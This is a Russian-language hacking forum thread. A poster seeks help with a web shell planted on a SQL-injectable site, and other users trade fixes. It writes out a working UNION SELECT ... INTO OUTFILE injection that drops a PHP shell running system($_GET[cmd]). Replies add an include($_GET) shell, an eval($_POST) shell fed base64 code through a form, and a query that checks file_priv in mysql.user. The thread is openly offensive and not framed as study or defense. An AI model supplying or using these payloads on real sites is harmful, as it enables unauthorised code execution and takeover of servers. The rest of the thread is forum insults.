Заливка php шелла
 

В общем имеется дырявый сайт с инъекцией http://site.com/bug.php?&id=-1' union select 1,2/*
Пытаюсь залить на него php-shell: http://site.com/bug.php?&id=-1' union select <? system($_GET[cmd]);?>,2 into outfile '/www/site/shell.php'/*
Шелл shell.php успешно создается но при попытке исполнить команду http://site.com/shell.php?cmd= ничего не выводится. Пытался использовать и exec() и passthru() - результат тот же. Функции system(),exec() и passthru() не задизейблены.
Подскажите что не так?
ЗЫ сервер крутится на винде

<? include($_GET[blablabla]);?>

И что? Как я понял это даст произвольные файлы инклудить а мне бы команды выполнять

Омфг. Инклудишь шелл, дальше работай шеллом. Удобнее как ни крути.

моё решение, заливаешь шелл вида
<?php eval($_POST['shell'])?>
создаёшь html файл с кодом
Затем берёшь и перегоняешь весь код шелла в base64 и пишешь нечто такое -
Вставляешь в textarea и отправляешь
Вот примерно так

http://site.com/bug.php?&id=-1' union select file_priv,2 from mysql.user/*
Если Y будет, то можно будет INTO OUTFILE, если N, то соответсвенно низя (ну и если выругается, что доступа нет - тоже)

Basurman, и зачем ему это? пздц, ты вообще первый пост читал?
ty13r, делай то что тебе Слип говорит
ЗЫ Ты кстати какие команды пытался выполнить?

вот к этому
P.S. пздц, а то непохек

ты што, наркоман? у него файл создаётся соответственно у юзера file_priv = 1, нахуя ему их узнавать то теперь раз он уже смог файл залить? ты сам понял чё написал?

Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
2Basurman
а ты знаешь что к таблице mysql.user вобще обычно доступ закрыт?